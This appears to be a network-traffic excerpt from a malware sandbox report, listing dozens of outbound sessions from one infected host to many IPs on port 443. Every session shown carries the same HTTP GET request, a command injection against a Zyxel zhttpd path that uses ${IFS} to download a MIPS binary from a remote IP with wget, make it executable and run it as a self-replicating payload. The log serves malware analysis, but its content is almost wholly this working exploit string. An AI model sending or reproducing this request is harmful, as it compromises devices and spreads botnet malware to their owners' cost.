                                          Jan 14, 2024 15:46:24.148577929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6319192.168.2.2343046187.17.54.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148597002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6320192.168.2.235938874.221.184.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148664951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6321192.168.2.2353492175.67.199.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148720980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6322192.168.2.235747812.19.65.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148750067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6323192.168.2.2342496160.5.92.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148809910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6324192.168.2.234762027.130.170.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148850918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6325192.168.2.235044494.118.201.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148883104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6326192.168.2.2349650205.253.149.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148942947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6327192.168.2.236034443.87.48.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.148983955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6328192.168.2.2340900105.44.70.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149040937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6329192.168.2.233895485.184.155.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149091959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6330192.168.2.233722868.37.229.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149122953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6331192.168.2.233909632.134.238.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149188995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6332192.168.2.2341774132.117.8.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149219990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6333192.168.2.2339980204.157.244.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149276018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6334192.168.2.2352972182.208.79.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149292946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6335192.168.2.2339348202.54.65.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149348021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6336192.168.2.234269099.177.120.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149386883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6337192.168.2.2339072195.167.21.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149441004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6338192.168.2.233441845.133.187.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149482012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6339192.168.2.233712080.79.222.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149514914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6340192.168.2.2338600104.108.177.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149574041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6341192.168.2.233983872.171.58.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149614096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6342192.168.2.234849020.235.136.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149633884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6343192.168.2.2348918145.165.243.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149651051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6344192.168.2.2343942157.79.83.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149707079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6345192.168.2.2345646203.200.43.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149753094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6346192.168.2.2360632113.25.75.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149780035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6347192.168.2.235592447.179.243.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149841070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6348192.168.2.233989285.112.47.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149876118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6349192.168.2.2354562217.122.129.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149914980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6350192.168.2.234139695.144.152.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149945974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6351192.168.2.235997677.91.12.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.149996042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6352192.168.2.2338996100.52.221.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150032043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6353192.168.2.2358154168.155.131.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150053024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6354192.168.2.234014272.31.175.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150083065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6355192.168.2.2346840202.73.216.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150105953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6356192.168.2.2355244209.59.70.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150140047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6357192.168.2.2357768173.56.34.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150162935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6358192.168.2.2348308101.187.196.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150181055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6359192.168.2.234906871.52.114.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150234938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6360192.168.2.2356794142.205.158.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150269032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6361192.168.2.235965675.247.192.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150306940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6362192.168.2.235558058.22.55.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150326014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6363192.168.2.2339212196.23.255.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150355101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6364192.168.2.235930263.126.173.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150408983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6365192.168.2.234451480.74.149.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150434971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6366192.168.2.2354326141.253.131.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150477886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6367192.168.2.234081474.47.104.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150538921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6368192.168.2.2337108219.76.54.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150552988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6369192.168.2.2346898138.60.60.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150615931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6370192.168.2.233924496.110.82.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150638103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6371192.168.2.2337760199.208.69.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150702953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6372192.168.2.235057414.137.113.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150719881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6373192.168.2.236097420.61.228.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150775909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6374192.168.2.235524483.90.173.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150796890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6375192.168.2.235244881.233.147.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150851965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6376192.168.2.2349458120.248.151.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150873899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6377192.168.2.234809696.19.160.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150918961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6378192.168.2.2360984168.53.86.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.150959969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6379192.168.2.235862278.220.182.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.151010990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6380192.168.2.235846479.35.140.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.151053905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6381192.168.2.2348422110.146.27.231443
                                          TimestampBytes transferredDirectionData
